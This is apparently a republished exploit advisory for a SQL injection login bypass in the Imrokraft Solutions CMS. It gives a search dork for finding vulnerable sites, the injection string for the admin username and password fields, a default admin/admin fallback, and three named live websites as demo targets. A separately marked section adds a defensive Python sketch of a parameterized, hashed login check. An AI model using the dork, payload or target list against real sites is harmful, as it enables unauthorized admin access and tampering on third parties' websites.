Imrokraft Solutions CMS Admin Page ByPass

2016.07.28
Credit: xBADGIRL21
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

##################################################################
# Exploit Title : Imrokraft Solutions CMS Admin Page ByPass
# Exploit Author : xBADGIRL21
# Dork : intext:"Designed by Imrokraft Solutions" or intext:"Powered By : Imrokraft Solutions"
# Vendor : http://www.imrokraft.com/
# Tested on: [ Windows ]
# skype:xbadgirl21
# Date: 2016/07/27
# video Proof : https://www.youtube.com/watch?v=jKOHmH2XId0
##################################################################
# Describe :
# This Exploit Allow The Attacker to bypass the admin
# page info.
# Login to the admin Dashboard Give you Full Access to
# Upload or Delete .....etc
# PoC:
# Put [admin] After url such as :
# http://site.com/admin
# Now enter fill username or email and Password like the information below :
# Username: '=' 'OR'
# Password: '=' 'OR'
# [!] OR U CAN TRY WITH DEFAULT LOGIN [!] :
# Username: admin
# Password: admin
# Live Demo :
# http://aptitudetrivandrum.com/
# http://aspirantonline.com/
# http://www.destinationdesigners.in/
##################################################################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
##################################################################

More of my Discovered Exploits :
https://packetstormsecurity.com/files/author/12483/
http://0day.today/author/29701
https://cxsecurity.com/search/author/DESC/AND/FIND/0/10/xBADGIRL21/

References:

https://www.youtube.com/watch?v=jKOHmH2XId0
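Mitigation sketch for the CWE-89 login bypass and the default admin/admin credential described above. This is an added example, not code from the advisory or from the vendor's CMS; the `admins` table, its columns, the function names and the sample passphrase are assumptions made for illustration.

```python
import hashlib
import hmac
import os
import sqlite3

PAYLOAD = "'=' 'OR'"  # string quoted in the advisory's PoC, used here only as test input

def hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def make_db() -> sqlite3.Connection:
    """Constructed sample store: one admin whose password is not the default."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (username TEXT PRIMARY KEY, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    db.execute("INSERT INTO admins VALUES (?, ?, ?)",
               ("admin", salt, hash_password("constructed-long-passphrase-42", salt)))
    return db

def concatenated_query_text(username: str, password: str) -> str:
    """CWE-89 anti-pattern, returned as text and never executed: the quote
    characters in the input become part of the SQL statement itself."""
    return ("SELECT 1 FROM admins WHERE username='" + username +
            "' AND password='" + password + "'")

def login(db: sqlite3.Connection, username: str, password: str) -> bool:
    """Hardened check: bound parameter for the lookup, salted hash compare for the password."""
    row = db.execute("SELECT salt, pw_hash FROM admins WHERE username = ?",
                     (username,)).fetchone()
    if row is None:
        hash_password(password, b"\x00" * 16)  # keep timing similar for unknown users
        return False
    salt, pw_hash = row
    return hmac.compare_digest(hash_password(password, salt), pw_hash)

if __name__ == "__main__":
    db = make_db()
    print(concatenated_query_text(PAYLOAD, PAYLOAD))  # 12 quotes instead of 4
    print(login(db, PAYLOAD, PAYLOAD), login(db, "admin", "admin"))  # False False
```

With a bound parameter the input is compared as a literal username, so it cannot change the structure of the query, and provisioning the account with a unique passphrase removes the default-login path.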



Copyright 2019, cxsecurity.com

 
